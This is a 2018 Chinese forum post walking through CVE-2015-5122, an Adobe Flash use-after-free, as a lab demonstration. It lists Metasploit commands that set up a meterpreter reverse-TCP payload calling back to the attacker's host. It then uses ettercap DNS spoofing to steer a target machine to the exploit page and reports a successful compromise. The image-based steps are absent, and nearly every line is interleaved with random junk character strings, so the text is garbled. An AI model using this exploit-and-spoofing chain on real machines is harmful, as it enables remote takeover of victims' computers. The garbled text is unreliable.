找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1546|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# q& h0 Y0 V0 N) d/ @& d3 _' x 二、cve2015-5122漏洞实例演示虚拟机 ; u- |- S# U! j+ N' z8 P

1 t- B# k- U4 n

8 |" J% c% H1 |% K0 N4 Y   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ) l8 o1 T7 Y& C8 C. B! j

' x% {4 j8 ^/ r+ A% X- ~& E$ m

; I! {3 M5 y, d search cve-2015-5122如图: 8 R6 n4 u( a- G; l: y; R

0 h+ S/ B' O6 l7 O* k: B8 _4 W# `& W8 u

. w4 c6 N. P4 e! ?   ( o9 @0 v) O2 ~3 d L3 v1 g

6 h& r8 z; U; c# d/ g

@$ G' @: E: X3 i' U$ N 下面我们敲如下命令: / }# u0 ?- M! s( ^/ M. k- h2 R

& F( S$ B. X/ C5 z

8 f2 v4 e1 M- m$ I! r/ T1 @ use exploit/multi/browser/adobe_flash_opaque_background_uaf / N. z" j% i' x9 e" Q; M5 s! V9 j

7 [ v6 n% i# z3 F q2 Q8 u

( _" x& S5 ?) |+ g1 s7 _ set PAYLOAD windows/meterpreter/reverse_tcp / T3 y3 G# x$ U# r" c

0 I& R; a+ p9 M/ O/ e% e% r

3 `5 b, u" ^8 L& |3 z set LHOST 192.168.0.109 , l& s T+ a, h+ F8 _

& B( {4 l# T$ y+ }1 p& \$ ] V. d3 }

) n3 T* `: e. E* U+ s) o set URIPATH /                        /*根目录*/ 7 }" c! |) [" M: W

: e& j d* m% c( ]6 `

9 w7 |& T+ s! k$ b: G/ u, C set SRVHOST 192.168.0.109  //192.168.0.109为kaili ip地址 B' _4 ~. a; e4 e1 H- w# c

# F3 [3 h5 P5 v9 ~/ W

, h4 a# M I& S0 l0 y set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 6 Z4 u" H' f& U3 A4 _, ]2 [

, c3 H" W" Z- T. o7 f

1 j/ c4 g9 D1 ?' E 然后show options如图: / `( _! \4 N' L6 m

. S4 q% O/ I; G. ]$ {% T. O

0 G( {4 ^, o4 E# u( o8 Q   9 A" T# g( C* C; L' z _

0 j V g9 p% M( [; }, H, O" t

# e3 u @. a( i8 r! @7 F 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
: G4 |" G0 _" `2 h, P9 P! m
0 d- U) N, Z3 |0 P

, t' _: `8 |' K. O1 w0 q' ?- B

# a+ V+ O% L/ u3 T1 E9 l 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 + w! [. g, n0 r# P) C

; l7 O* X! Q, J9 \8 ?2 R

# d1 S) F9 Y& b4 H Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf . M& v" N( v- C0 |

( [+ w( v% n! O$ ]4 s C4 G

' M9 e' k) a" [$ G9 b. K. ~: R1 n% X   7 w% ]6 Y7 A0 c% Y; N' ~) L/ J

# j6 Q7 ~( l/ ^

4 _# O3 m7 B9 L5 G, Q/ p& c: p: @ 成功了,这时候我们断开ettercap,如图: . @- D9 ~6 |3 k4 v5 k

, h& u/ c% M W) @, {

0 M* M" @7 R% }2 N, [' _   # s/ k. ~! h$ v! y' c

2 N4 Q7 f/ `: \! g: F8 p9 O6 k, k" l

2 j# z$ ~/ r7 ~2 F1 P6 S- e2 M4 ? Screenshot如图: 8 q. S- e: C/ q' J

5 Y/ `$ w6 [6 ?

9 {8 i; p; o$ T7 s: \4 M+ T% {   . e, G9 \. ~5 P( `+ e

1 f8 B) Q7 r% V& d

, H" x, Y1 r6 r8 I $ J" n$ @* P) y1 E' ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表